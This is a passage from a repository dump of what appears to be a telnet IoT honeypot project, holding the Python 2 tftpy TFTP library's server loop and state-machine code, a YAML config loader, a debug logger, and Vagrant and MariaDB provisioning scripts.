sessions:\")\n                    for session_key, session in self.sessions.items():\n                        log.info(\"    %s\" % session)\n\n                else:\n                    # Must find the owner of this traffic.\n                    for key in 
self.sessions:\n                        if readysock == self.sessions[key].sock:\n                            log.info(\"Matched input to session key %s\"\n                                % key)\n                            try:\n                                self.sessions[key].cycle()\n                                if self.sessions[key].state == None:\n                                    log.info(\"Successful transfer.\")\n                                    deletion_list.append(key)\n                            except TftpException, err:\n                                deletion_list.append(key)\n                                log.error(\"Fatal exception thrown from \"\n                                          \"session %s: %s\"\n                                          % (key, str(err)))\n                            # Break out of for loop since we found the correct\n                            # session.\n                            break\n\n                    else:\n                        log.error(\"Can't find the owner for this packet. 
\"\n                                  \"Discarding.\")\n\n            log.debug(\"Looping on all sessions to check for timeouts\")\n            now = time.time()\n            for key in self.sessions:\n                try:\n                    self.sessions[key].checkTimeout(now)\n                except TftpTimeout, err:\n                    log.error(str(err))\n                    self.sessions[key].retry_count += 1\n                    if self.sessions[key].retry_count >= TIMEOUT_RETRIES:\n                        log.debug(\"hit max retries on %s, giving up\"\n                            % self.sessions[key])\n                        deletion_list.append(key)\n                    else:\n                        log.debug(\"resending on session %s\"\n                            % self.sessions[key])\n                        self.sessions[key].state.resendLast()\n\n            log.debug(\"Iterating deletion list.\")\n            for key in deletion_list:\n                log.info('')\n                log.info(\"Session %s complete\" % key)\n                if self.sessions.has_key(key):\n                    log.debug(\"Gathering up metrics from session before deleting\")\n                    self.sessions[key].end()\n                    metrics = self.sessions[key].metrics\n                    if metrics.duration == 0:\n                        log.info(\"Duration too short, rate undetermined\")\n                    else:\n                        log.info(\"Transferred %d bytes in %.2f seconds\"\n                            % (metrics.bytes, metrics.duration))\n                        log.info(\"Average rate: %.2f kbps\" % metrics.kbps)\n                    log.info(\"%.2f bytes in resent data\" % metrics.resent_bytes)\n                    log.info(\"%d duplicate packets\" % metrics.dupcount)\n                    log.debug(\"Deleting session %s\" % key)\n                    del self.sessions[key]\n                    log.debug(\"Session list is now %s\" % 
self.sessions)\n                else:\n                    log.warn(\"Strange, session %s is not in the session list\"\n                        % key)\n"
  },
  {
    "path": "tftpy/TftpShared.py",
    "content": "\"\"\"This module holds all objects shared by all other modules in tftpy.\"\"\"\n\nimport logging\n\nLOG_LEVEL = logging.NOTSET\nMIN_BLKSIZE = 8\nDEF_BLKSIZE = 512\nMAX_BLKSIZE = 65536\nSOCK_TIMEOUT = 5\nMAX_DUPS = 20\nTIMEOUT_RETRIES = 5\nDEF_TFTP_PORT = 69\n\n# A hook for deliberately introducing delay in testing.\nDELAY_BLOCK = 0\n\n# Initialize the logger.\nlogging.basicConfig()\n# The logger used by this library. Feel free to clobber it with your own, if you like, as\n# long as it conforms to Python's logging.\nlog = logging.getLogger('tftpy')\n\ndef tftpassert(condition, msg):\n    \"\"\"This function is a simple utility that will check the condition\n    passed for a false state. If it finds one, it throws a TftpException\n    with the message passed. This just makes the code throughout cleaner\n    by refactoring.\"\"\"\n    if not condition:\n        raise TftpException, msg\n\ndef setLogLevel(level):\n    \"\"\"This function is a utility function for setting the internal log level.\n    The log level defaults to logging.NOTSET, so unwanted output to stdout is\n    not created.\"\"\"\n    global log\n    log.setLevel(level)\n\nclass TftpErrors(object):\n    \"\"\"This class is a convenience for defining the common tftp error codes,\n    and making them more readable in the code.\"\"\"\n    NotDefined = 0\n    FileNotFound = 1\n    AccessViolation = 2\n    DiskFull = 3\n    IllegalTftpOp = 4\n    UnknownTID = 5\n    FileAlreadyExists = 6\n    NoSuchUser = 7\n    FailedNegotiation = 8\n\nclass TftpException(Exception):\n    \"\"\"This class is the parent class of all exceptions regarding the handling\n    of the TFTP protocol.\"\"\"\n    pass\n\nclass TftpTimeout(TftpException):\n    \"\"\"This class represents a timeout error waiting for a response from the\n    other end.\"\"\"\n    pass\n"
  },
  {
    "path": "tftpy/TftpStates.py",
    "content": "\"\"\"This module implements all state handling during uploads and downloads, the\nmain interface to which being the TftpState base class. \n\nThe concept is simple. Each context object represents a single upload or\ndownload, and the state object in the context object represents the current\nstate of that transfer. The state object has a handle() method that expects\nthe next packet in the transfer, and returns a state object until the transfer\nis complete, at which point it returns None. That is, unless there is a fatal\nerror, in which case a TftpException is returned instead.\"\"\"\n\nfrom TftpShared import *\nfrom TftpPacketTypes import *\nimport os\n\n###############################################################################\n# State classes\n###############################################################################\n\nclass TftpState(object):\n    \"\"\"The base class for the states.\"\"\"\n\n    def __init__(self, context):\n        \"\"\"Constructor for setting up common instance variables. The involved\n        file object is required, since in tftp there's always a file\n        involved.\"\"\"\n        self.context = context\n\n    def handle(self, pkt, raddress, rport):\n        \"\"\"An abstract method for handling a packet. 
It is expected to return\n        a TftpState object, either itself or a new state.\"\"\"\n        raise NotImplementedError, \"Abstract method\"\n\n    def handleOACK(self, pkt):\n        \"\"\"This method handles an OACK from the server, syncing any accepted\n        options.\"\"\"\n        if len(pkt.options.keys()) > 0:\n            if pkt.match_options(self.context.options):\n                log.info(\"Successful negotiation of options\")\n                # Set options to OACK options\n                self.context.options = pkt.options\n                for key in self.context.options:\n                    log.info(\"    %s = %s\" % (key, self.context.options[key]))\n            else:\n                log.error(\"Failed to negotiate options\")\n                raise TftpException, \"Failed to negotiate options\"\n        else:\n            raise TftpException, \"No options found in OACK\"\n\n    def returnSupportedOptions(self, options):\n        \"\"\"This method takes a requested options list from a client, and\n        returns the ones that are supported.\"\"\"\n        # We support the options blksize and tsize right now.\n        # FIXME - put this somewhere else?\n        accepted_options = {}\n        for option in options:\n            if option == 'blksize':\n                # Make sure it's valid.\n                if int(options[option]) > MAX_BLKSIZE:\n                    log.info(\"Client requested blksize greater than %d, \"\n                             \"setting to maximum\" % MAX_BLKSIZE)\n                    accepted_options[option] = MAX_BLKSIZE\n                elif int(options[option]) < MIN_BLKSIZE:\n                    log.info(\"Client requested blksize less than %d, \"\n                             \"setting to minimum\" % MIN_BLKSIZE)\n                    accepted_options[option] = MIN_BLKSIZE\n                else:\n                    accepted_options[option] = options[option]\n            elif option == 'tsize':\n               
log.debug(\"tsize option is set\")\n                accepted_options['tsize'] = 1\n            else:\n                log.info(\"Dropping unsupported option '%s'\" % option)\n        log.debug(\"Returning these accepted options: %s\" % accepted_options)\n        return accepted_options\n\n    def serverInitial(self, pkt, raddress, rport):\n        \"\"\"This method performs initial setup for a server context transfer,\n        put here to refactor code out of the TftpStateServerRecvRRQ and\n        TftpStateServerRecvWRQ classes, since their initial setup is\n        identical. The method returns a boolean, sendoack, to indicate whether\n        it is required to send an OACK to the client.\"\"\"\n        options = pkt.options\n        sendoack = False\n        if not self.context.tidport:\n            self.context.tidport = rport\n            log.info(\"Setting tidport to %s\" % rport)\n\n        log.debug(\"Setting default options, blksize\")\n        self.context.options = { 'blksize': DEF_BLKSIZE }\n\n        if options:\n            log.debug(\"Options requested: %s\" % options)\n            supported_options = self.returnSupportedOptions(options)\n            self.context.options.update(supported_options)\n            sendoack = True\n\n        # FIXME - only octet mode is supported at this time.\n        if pkt.mode != 'octet':\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \\\n                \"Only octet transfers are supported at this time.\"\n\n        # test host/port of client end\n        if self.context.host != raddress or self.context.port != rport:\n            self.sendError(TftpErrors.UnknownTID)\n            log.error(\"Expected traffic from %s:%s but received it \"\n                            \"from %s:%s instead.\"\n                            % (self.context.host,\n                               self.context.port,\n                               raddress,\n                               rport))\n      
      # FIXME: increment an error count?\n            # Return same state, we're still waiting for valid traffic.\n            return self\n\n        log.debug(\"Requested filename is %s\" % pkt.filename)\n        # There are no os.sep's allowed in the filename.\n        # FIXME: Should we allow subdirectories?\n        if pkt.filename.find(os.sep) >= 0:\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"%s found in filename, not permitted\" % os.sep\n\n        self.context.file_to_transfer = pkt.filename\n\n        return sendoack\n\n    def sendDAT(self):\n        \"\"\"This method sends the next DAT packet based on the data in the\n        context. It returns a boolean indicating whether the transfer is\n        finished.\"\"\"\n        finished = False\n        blocknumber = self.context.next_block\n        # Test hook\n        if DELAY_BLOCK and DELAY_BLOCK == blocknumber:\n            import time\n            log.debug(\"Deliberately delaying 10 seconds...\")\n            time.sleep(10)\n        tftpassert( blocknumber > 0, \"There is no block zero!\" )\n        dat = None\n        blksize = self.context.getBlocksize()\n        buffer = self.context.fileobj.read(blksize)\n        log.debug(\"Read %d bytes into buffer\" % len(buffer))\n        if len(buffer) < blksize:\n            log.info(\"Reached EOF on file %s\"\n                % self.context.file_to_transfer)\n            finished = True\n        dat = TftpPacketDAT()\n        dat.data = buffer\n        dat.blocknumber = blocknumber\n        self.context.metrics.bytes += len(dat.data)\n        log.debug(\"Sending DAT packet %d\" % dat.blocknumber)\n        self.context.sock.sendto(dat.encode().buffer,\n                                 (self.context.host, self.context.tidport))\n        if self.context.packethook:\n            self.context.packethook(dat)\n        self.context.last_pkt = dat\n        return finished\n\n    def sendACK(self, blocknumber=None):\n      
  \"\"\"This method sends an ack packet to the block number specified. If\n        none is specified, it defaults to the next_block property in the\n        parent context.\"\"\"\n        log.debug(\"In sendACK, passed blocknumber is %s\" % blocknumber)\n        if blocknumber is None:\n            blocknumber = self.context.next_block\n        log.info(\"Sending ack to block %d\" % blocknumber)\n        ackpkt = TftpPacketACK()\n        ackpkt.blocknumber = blocknumber\n        self.context.sock.sendto(ackpkt.encode().buffer,\n                                 (self.context.host,\n                                  self.context.tidport))\n        self.context.last_pkt = ackpkt\n\n    def sendError(self, errorcode):\n        \"\"\"This method uses the socket passed, and uses the errorcode to\n        compose and send an error packet.\"\"\"\n        log.debug(\"In sendError, being asked to send error %d\" % errorcode)\n        errpkt = TftpPacketERR()\n        errpkt.errorcode = errorcode\n        self.context.sock.sendto(errpkt.encode().buffer,\n                                 (self.context.host,\n                                  self.context.tidport))\n        self.context.last_pkt = errpkt\n\n    def sendOACK(self):\n        \"\"\"This method sends an OACK packet with the options from the current\n        context.\"\"\"\n        log.debug(\"In sendOACK with options %s\" % self.context.options)\n        pkt = TftpPacketOACK()\n        pkt.options = self.context.options\n        self.context.sock.sendto(pkt.encode().buffer,\n                                 (self.context.host,\n                                  self.context.tidport))\n        self.context.last_pkt = pkt\n\n    def resendLast(self):\n        \"Resend the last sent packet due to a timeout.\"\n        log.warn(\"Resending packet %s on sessions %s\"\n            % (self.context.last_pkt, self))\n        self.context.metrics.resent_bytes += len(self.context.last_pkt.buffer)\n        
self.context.metrics.add_dup(self.context.last_pkt)\n        self.context.sock.sendto(self.context.last_pkt.encode().buffer,\n                                 (self.context.host, self.context.tidport))\n        if self.context.packethook:\n            self.context.packethook(self.context.last_pkt)\n\n    def handleDat(self, pkt):\n        \"\"\"This method handles a DAT packet during a client download, or a\n        server upload.\"\"\"\n        log.info(\"Handling DAT packet - block %d\" % pkt.blocknumber)\n        log.debug(\"Expecting block %s\" % self.context.next_block)\n        if pkt.blocknumber == self.context.next_block:\n            log.debug(\"Good, received block %d in sequence\"\n                        % pkt.blocknumber)\n\n            self.sendACK()\n            self.context.next_block += 1\n\n            log.debug(\"Writing %d bytes to output file\"\n                        % len(pkt.data))\n            self.context.fileobj.write(pkt.data)\n            self.context.metrics.bytes += len(pkt.data)\n            # Check for end-of-file, any less than full data packet.\n            if len(pkt.data) < self.context.getBlocksize():\n                log.info(\"End of file detected\")\n                return None\n\n        elif pkt.blocknumber < self.context.next_block:\n            if pkt.blocknumber == 0:\n                log.warn(\"There is no block zero!\")\n                self.sendError(TftpErrors.IllegalTftpOp)\n                raise TftpException, \"There is no block zero!\"\n            log.warn(\"Dropping duplicate block %d\" % pkt.blocknumber)\n            self.context.metrics.add_dup(pkt)\n            log.debug(\"ACKing block %d again, just in case\" % pkt.blocknumber)\n            self.sendACK(pkt.blocknumber)\n\n        else:\n            # FIXME: should we be more tolerant and just discard instead?\n            msg = \"Whoa! 
Received future block %d but expected %d\" \\\n                % (pkt.blocknumber, self.context.next_block)\n            log.error(msg)\n            raise TftpException, msg\n\n        # Default is to ack\n        return TftpStateExpectDAT(self.context)\n\nclass TftpStateServerRecvRRQ(TftpState):\n    \"\"\"This class represents the state of the TFTP server when it has just\n    received an RRQ packet.\"\"\"\n    def handle(self, pkt, raddress, rport):\n        \"Handle an initial RRQ packet as a server.\"\n        log.debug(\"In TftpStateServerRecvRRQ.handle\")\n        sendoack = self.serverInitial(pkt, raddress, rport)\n        path = self.context.root + os.sep + self.context.file_to_transfer\n        log.info(\"Opening file %s for reading\" % path)\n        if os.path.exists(path):\n            # Note: Open in binary mode for win32 portability, since win32\n            # blows.\n            self.context.fileobj = open(path, \"rb\")\n        elif self.context.dyn_file_func:\n            log.debug(\"No such file %s but using dyn_file_func\" % path)\n            self.context.fileobj = \\\n                self.context.dyn_file_func(self.context.file_to_transfer)\n\n            if self.context.fileobj is None:\n                log.debug(\"dyn_file_func returned 'None', treating as \"\n                          \"FileNotFound\")\n                self.sendError(TftpErrors.FileNotFound)\n                raise TftpException, \"File not found: %s\" % path\n        else:\n            self.sendError(TftpErrors.FileNotFound)\n            raise TftpException, \"File not found: %s\" % path\n\n        # Options negotiation.\n        if sendoack:\n            # Note, next_block is 0 here since that's the proper\n            # acknowledgement to an OACK.\n            # FIXME: perhaps we do need a TftpStateExpectOACK class...\n            self.sendOACK()\n            # Note, self.context.next_block is already 0.\n        else:\n            self.context.next_block = 1\n            
log.debug(\"No requested options, starting send...\")\n            self.context.pending_complete = self.sendDAT()\n        # Note, we expect an ack regardless of whether we sent a DAT or an\n        # OACK.\n        return TftpStateExpectACK(self.context)\n\n        # Note, we don't have to check any other states in this method, that's\n        # up to the caller.\n\nclass TftpStateServerRecvWRQ(TftpState):\n    \"\"\"This class represents the state of the TFTP server when it has just\n    received a WRQ packet.\"\"\"\n    def handle(self, pkt, raddress, rport):\n        \"Handle an initial WRQ packet as a server.\"\n        log.debug(\"In TftpStateServerRecvWRQ.handle\")\n        sendoack = self.serverInitial(pkt, raddress, rport)\n        path = self.context.root + os.sep + self.context.file_to_transfer\n        log.info(\"Opening file %s for writing\" % path)\n        if os.path.exists(path):\n            # FIXME: correct behavior?\n            log.warn(\"File %s exists already, overwriting...\" % self.context.file_to_transfer)\n        # FIXME: I think we should upload to a temp file and not overwrite the\n        # existing file until the file is successfully uploaded.\n        self.context.fileobj = open(path, \"wb\")\n\n        # Options negotiation.\n        if sendoack:\n            log.debug(\"Sending OACK to client\")\n            self.sendOACK()\n        else:\n            log.debug(\"No requested options, expecting transfer to begin...\")\n            self.sendACK()\n        # Whether we're sending an oack or not, we're expecting a DAT for\n        # block 1\n        self.context.next_block = 1\n        # We may have sent an OACK, but we're expecting a DAT as the response\n        # to either the OACK or an ACK, so lets unconditionally use the\n        # TftpStateExpectDAT state.\n        return TftpStateExpectDAT(self.context)\n\n        # Note, we don't have to check any other states in this method, that's\n        # up to the caller.\n\nclass 
TftpStateServerStart(TftpState):\n    \"\"\"The start state for the server. This is a transitory state since at\n    this point we don't know if we're handling an upload or a download. We\n    will commit to one of them once we interpret the initial packet.\"\"\"\n    def handle(self, pkt, raddress, rport):\n        \"\"\"Handle a packet we just received.\"\"\"\n        log.debug(\"In TftpStateServerStart.handle\")\n        if isinstance(pkt, TftpPacketRRQ):\n            log.debug(\"Handling an RRQ packet\")\n            return TftpStateServerRecvRRQ(self.context).handle(pkt,\n                                                               raddress,\n                                                               rport)\n        elif isinstance(pkt, TftpPacketWRQ):\n            log.debug(\"Handling a WRQ packet\")\n            return TftpStateServerRecvWRQ(self.context).handle(pkt,\n                                                               raddress,\n                                                               rport)\n        else:\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \\\n                \"Invalid packet to begin up/download: %s\" % pkt\n\nclass TftpStateExpectACK(TftpState):\n    \"\"\"This class represents the state of the transfer when a DAT was just\n    sent, and we are waiting for an ACK from the server. 
This class is the\n    same one used by the client during the upload, and the server during the\n    download.\"\"\"\n    def handle(self, pkt, raddress, rport):\n        \"Handle a packet, hopefully an ACK since we just sent a DAT.\"\n        if isinstance(pkt, TftpPacketACK):\n            log.info(\"Received ACK for packet %d\" % pkt.blocknumber)\n            # Is this an ack to the one we just sent?\n            if self.context.next_block == pkt.blocknumber:\n                if self.context.pending_complete:\n                    log.info(\"Received ACK to final DAT, we're done.\")\n                    return None\n                else:\n                    log.debug(\"Good ACK, sending next DAT\")\n                    self.context.next_block += 1\n                    log.debug(\"Incremented next_block to %d\"\n                        % (self.context.next_block))\n                    self.context.pending_complete = self.sendDAT()\n\n            elif pkt.blocknumber < self.context.next_block:\n                log.debug(\"Received duplicate ACK for block %d\"\n                    % pkt.blocknumber)\n                self.context.metrics.add_dup(pkt)\n\n            else:\n                log.warn(\"Oooh, time warp. Received ACK to packet we \"\n                         \"didn't send yet. Discarding.\")\n                self.context.metrics.errors += 1\n            return self\n        elif isinstance(pkt, TftpPacketERR):\n            log.error(\"Received ERR packet from peer: %s\" % str(pkt))\n            raise TftpException, \\\n                \"Received ERR packet from peer: %s\" % str(pkt)\n        else:\n            log.warn(\"Discarding unsupported packet: %s\" % str(pkt))\n            return self\n\nclass TftpStateExpectDAT(TftpState):\n    \"\"\"Just sent an ACK packet. 
Waiting for DAT.\"\"\"\n    def handle(self, pkt, raddress, rport):\n        \"\"\"Handle the packet in response to an ACK, which should be a DAT.\"\"\"\n        if isinstance(pkt, TftpPacketDAT):\n            return self.handleDat(pkt)\n\n        # Every other packet type is a problem.\n        elif isinstance(pkt, TftpPacketACK):\n            # Umm, we ACK, you don't.\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received ACK from peer when expecting DAT\"\n\n        elif isinstance(pkt, TftpPacketWRQ):\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received WRQ from peer when expecting DAT\"\n\n        elif isinstance(pkt, TftpPacketERR):\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received ERR from peer: \" + str(pkt)\n\n        else:\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received unknown packet type from peer: \" + str(pkt)\n\nclass TftpStateSentWRQ(TftpState):\n    \"\"\"Just sent an WRQ packet for an upload.\"\"\"\n    def handle(self, pkt, raddress, rport):\n        \"\"\"Handle a packet we just received.\"\"\"\n        if not self.context.tidport:\n            self.context.tidport = rport\n            log.debug(\"Set remote port for session to %s\" % rport)\n\n        # If we're going to successfully transfer the file, then we should see\n        # either an OACK for accepted options, or an ACK to ignore options.\n        if isinstance(pkt, TftpPacketOACK):\n            log.info(\"Received OACK from server\")\n            try:\n                self.handleOACK(pkt)\n            except TftpException:\n                log.error(\"Failed to negotiate options\")\n                self.sendError(TftpErrors.FailedNegotiation)\n                raise\n            else:\n                log.debug(\"Sending first DAT packet\")\n                self.context.pending_complete = 
self.sendDAT()\n                log.debug(\"Changing state to TftpStateExpectACK\")\n                return TftpStateExpectACK(self.context)\n\n        elif isinstance(pkt, TftpPacketACK):\n            log.info(\"Received ACK from server\")\n            log.debug(\"Apparently the server ignored our options\")\n            # The block number should be zero.\n            if pkt.blocknumber == 0:\n                log.debug(\"Ack blocknumber is zero as expected\")\n                log.debug(\"Sending first DAT packet\")\n                self.context.pending_complete = self.sendDAT()\n                log.debug(\"Changing state to TftpStateExpectACK\")\n                return TftpStateExpectACK(self.context)\n            else:\n                log.warn(\"Discarding ACK to block %s\" % pkt.blocknumber)\n                log.debug(\"Still waiting for valid response from server\")\n                return self\n\n        elif isinstance(pkt, TftpPacketERR):\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received ERR from server: \" + str(pkt)\n\n        elif isinstance(pkt, TftpPacketRRQ):\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received RRQ from server while in upload\"\n\n        elif isinstance(pkt, TftpPacketDAT):\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received DAT from server while in upload\"\n\n        else:\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received unknown packet type from server: \" + str(pkt)\n\n        # By default, no state change.\n        return self\n\nclass TftpStateSentRRQ(TftpState):\n    \"\"\"Just sent an RRQ packet.\"\"\"\n    def handle(self, pkt, raddress, rport):\n        \"\"\"Handle the packet in response to an RRQ to the server.\"\"\"\n        if not self.context.tidport:\n            self.context.tidport = rport\n            log.info(\"Set remote port 
for session to %s\" % rport)\n\n        # Now check the packet type and dispatch it properly.\n        if isinstance(pkt, TftpPacketOACK):\n            log.info(\"Received OACK from server\")\n            try:\n                self.handleOACK(pkt)\n            except TftpException, err:\n                log.error(\"Failed to negotiate options: %s\" % str(err))\n                self.sendError(TftpErrors.FailedNegotiation)\n                raise\n            else:\n                log.debug(\"Sending ACK to OACK\")\n\n                self.sendACK(blocknumber=0)\n\n                log.debug(\"Changing state to TftpStateExpectDAT\")\n                return TftpStateExpectDAT(self.context)\n\n        elif isinstance(pkt, TftpPacketDAT):\n            # If there are any options set, then the server didn't honour any\n            # of them.\n            log.info(\"Received DAT from server\")\n            if self.context.options:\n                log.info(\"Server ignored options, falling back to defaults\")\n                self.context.options = { 'blksize': DEF_BLKSIZE }\n            return self.handleDat(pkt)\n\n        # Every other packet type is a problem.\n        elif isinstance(pkt, TftpPacketACK):\n            # Umm, we ACK, the server doesn't.\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received ACK from server while in download\"\n\n        elif isinstance(pkt, TftpPacketWRQ):\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received WRQ from server while in download\"\n\n        elif isinstance(pkt, TftpPacketERR):\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received ERR from server: \" + str(pkt)\n\n        else:\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received unknown packet type from server: \" + str(pkt)\n\n        # By default, no state change.\n        return self\n"
  },
  {
    "path": "tftpy/__init__.py",
    "content": "\"\"\"\nThis library implements the tftp protocol, based on rfc 1350.\nhttp://www.faqs.org/rfcs/rfc1350.html\nAt the moment it implements only a client class, but will include a server,\nwith support for variable block sizes.\n\nAs a client of tftpy, this is the only module that you should need to import\ndirectly. The TftpClient and TftpServer classes can be reached through it.\n\"\"\"\n\nimport sys\n\n# Make sure that this is at least Python 2.3\nverlist = sys.version_info\nif not verlist[0] >= 2 or not verlist[1] >= 3:\n    raise AssertionError, \"Requires at least Python 2.3\"\n\nfrom TftpShared import *\nfrom TftpPacketTypes import *\nfrom TftpPacketFactory import *\nfrom TftpClient import *\nfrom TftpServer import *\nfrom TftpContexts import *\nfrom TftpStates import *\n"
  },
  {
    "path": "util/__init__.py",
    "content": ""
  },
  {
    "path": "util/config.py",
    "content": "import yaml\nimport random\nimport string\n\ndef rand():\n\tchars = string.ascii_uppercase + string.digits\n\treturn ''.join(random.SystemRandom().choice(chars) for _ in range(32))\n\nclass Config:\n\tdef __init__(self):\n\t\tself.distconfig = self.loadyaml(\"config.dist.yaml\")\n\t\ttry:\n\t\t\tself.userconfig = self.loadyaml(\"config.yaml\")\n\t\texcept Exception:\n\t\t\tprint \"Warning: Cannot load config.yaml\"\n\t\t\tself.userconfig = {}\n\n\tdef loadyaml(self, filename):\n\t\t# safe_load only builds plain YAML types, unlike yaml.load,\n\t\t# which can construct arbitrary Python objects\n\t\twith open(filename, \"rb\") as fp:\n\t\t\tdata = fp.read()\n\t\t\treturn yaml.safe_load(data)\n\n\tdef loadUserConfig(self, filename):\n\t\ttry:\n\t\t\tself.userconfig = self.loadyaml(filename)\n\t\texcept Exception:\n\t\t\tprint \"Warning: Cannot load \" + str(filename)\n\n\tdef get(self, key, optional=False, default=None):\n\t\tif key in self.userconfig:\n\t\t\treturn self.userconfig[key]\n\t\telif key in self.distconfig:\n\t\t\treturn self.distconfig[key]\n\t\telif not optional:\n\t\t\traise Exception(\"Option \\\"\" + key + \"\\\" not found in config\")\n\t\telse:\n\t\t\treturn default\n\nconfig = Config()\n"
  },
  {
    "path": "util/dbg.py",
    "content": "import datetime\nimport traceback\nimport sys\nimport os.path\n\nDEBUG = True\n\ndef dbg(msg):\n\tif DEBUG:\n\t\tnow  = datetime.datetime.now()\n\t\tnow  = now.strftime('%Y-%m-%d %H:%M:%S')\n\t\tline = traceback.extract_stack()[-2]\n\t\tline = os.path.basename(line[0]) + \":\" + str(line[1])\n\t\tprint(now + \"   \" + line.ljust(16, \" \") + \"  \" + msg)\n\t\tsys.stdout.flush()\n"
  },
  {
    "path": "vagrant/.gitignore",
    "content": ".vagrant\n*.log\n\n"
  },
  {
    "path": "vagrant/mariadb/Vagrantfile",
    "content": "# -*- mode: ruby -*-\n# vi: set ft=ruby :\n\n# All Vagrant configuration is done below. The \"2\" in Vagrant.configure\n# configures the configuration version (we support older styles for\n# backwards compatibility). Please don't change it unless you know what\n# you're doing.\n\nVagrant.configure(2) do |config|\n\n  # The most common configuration options are documented and commented below.\n  # For a complete reference, please see the online documentation at\n  # https://docs.vagrantup.com.\n\n  # Every Vagrant development environment requires a box. You can search for\n  # boxes at https://atlas.hashicorp.com/search.\n  config.vm.box = \"ubuntu/xenial64\"\n\n  # Disable automatic box update checking. If you disable this, then\n  # boxes will only be checked for updates when the user runs\n  # `vagrant box outdated`. This is not recommended.\n  # config.vm.box_check_update = false\n\n  # Create a forwarded port mapping which allows access to a specific port\n  # within the machine from a port on the host machine. In the example below,\n  # accessing \"localhost:8080\" will access port 80 on the guest machine.\n  config.vm.network \"forwarded_port\", guest: 5000, host: 5000\n  config.vm.network \"forwarded_port\", guest: 2323, host: 2323\n\n  # Create a private network, which allows host-only access to the machine\n  # using a specific IP.\n  # config.vm.network \"private_network\", ip: \"192.168.33.10\"\n\n  # Create a public network, which generally matched to bridged network.\n  # Bridged networks make the machine appear as another physical device on\n  # your network.\n  # config.vm.network \"public_network\"\n\n  # Share an additional folder to the guest VM. The first argument is\n  # the path on the host to the actual folder. The second argument is\n  # the path on the guest to mount the folder. 
And the optional third\n  # argument is a set of non-required options.\n  config.vm.synced_folder \"../../\", \"/vagrant_data\"\n\n  # Provider-specific configuration so you can fine-tune various\n  # backing providers for Vagrant. These expose provider-specific options.\n  # Example for VirtualBox:\n  \n  config.vm.provider \"virtualbox\" do |vb|\n    # Display the VirtualBox GUI when booting the machine\n    vb.gui = false\n  \n    # Customize the amount of memory on the VM:\n    vb.memory   = \"1024\"\n    # vb.cpus   = 2\n  end\n\n  # View the documentation for the provider you are using for more\n  # information on available options.\n\n  # Define a Vagrant Push strategy for pushing to Atlas. Other push strategies\n  # such as FTP and Heroku are also available. See the documentation at\n  # https://docs.vagrantup.com/v2/push/atlas.html for more information.\n  # config.push.define \"atlas\" do |push|\n  #   push.app = \"YOUR_ATLAS_USERNAME/YOUR_APPLICATION_NAME\"\n  # end\n\n  # Enable provisioning with a shell script. Additional provisioners such as\n  # Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the\n  # documentation for more information about their specific syntax and use.\n  # Note: privileged takes a boolean; the string 'false' is truthy in Ruby\n  # and would silently run the script as root.\n  config.vm.provision \"shell\", privileged: false, inline: <<-SHELL\n    sudo apt-get update\n    sudo apt-get install -y python-pip sqlite3 screen libmysqlclient-dev python-mysqldb\n    \n    cp -r /vagrant_data telnet-iot-honeypot\n    cd telnet-iot-honeypot\n    rm -f database.db\n    rm -f config.yaml\n\n    export LC_ALL=C\n    sudo pip install -r requirements.txt\n\n    sudo bash create_config.sh\n    sudo bash vagrant/mariadb/mysql.sh\n  SHELL\n\n  config.vm.provision \"shell\", privileged: false, run: 'always', inline: <<-SHELL\n    screen -dmS backend  bash -c \"cd telnet-iot-honeypot; python backend.py\"\n    sleep 5\n    screen -dmS honeypot bash -c \"cd telnet-iot-honeypot; python honeypot.py\"\n    screen -list\n  SHELL\nend\n"
  },
  {
    "path": "vagrant/mariadb/mysql.sh",
    "content": "#!/bin/bash\n\necho \" - Install MariaDB\"\nsudo apt-get install -y mariadb-server\n\nuser=honey\ndb=honey\npw=$(openssl rand -hex 16)\nsql=\"mysql+mysqldb://$user:$pw@localhost/$db\"\n\necho \" - Create DB\"\necho \"\"\necho \"DROP USER $user;\"               | sudo mysql\necho \"DROP USER '$user'@'localhost';\" | sudo mysql\necho \"DROP DATABASE $db;\"             | sudo mysql\necho \"CREATE USER '$user'@'localhost' IDENTIFIED BY '$pw';\nCREATE DATABASE $db CHARACTER SET latin1 COLLATE latin1_swedish_ci;\nGRANT ALL ON $db.* TO '$user'@'localhost';\nFLUSH PRIVILEGES;\n\" | sudo mysql\n\necho \" - Writing config\"\necho sql: \\\"$sql\\\" >> config.yaml\n"
  },
  {
    "path": "vagrant/sqlite/Vagrantfile",
    "content": "# -*- mode: ruby -*-\n# vi: set ft=ruby :\n\n# All Vagrant configuration is done below. The \"2\" in Vagrant.configure\n# configures the configuration version (we support older styles for\n# backwards compatibility). Please don't change it unless you know what\n# you're doing.\n\nVagrant.configure(2) do |config|\n\n  # The most common configuration options are documented and commented below.\n  # For a complete reference, please see the online documentation at\n  # https://docs.vagrantup.com.\n\n  # Every Vagrant development environment requires a box. You can search for\n  # boxes at https://atlas.hashicorp.com/search.\n  config.vm.box = \"ubuntu/xenial64\"\n\n  # Disable automatic box update checking. If you disable this, then\n  # boxes will only be checked for updates when the user runs\n  # `vagrant box outdated`. This is not recommended.\n  # config.vm.box_check_update = false\n\n  # Create a forwarded port mapping which allows access to a specific port\n  # within the machine from a port on the host machine. In the example below,\n  # accessing \"localhost:8080\" will access port 80 on the guest machine.\n  config.vm.network \"forwarded_port\", guest: 5000, host: 5000\n  config.vm.network \"forwarded_port\", guest: 2323, host: 2323\n\n  # Create a private network, which allows host-only access to the machine\n  # using a specific IP.\n  # config.vm.network \"private_network\", ip: 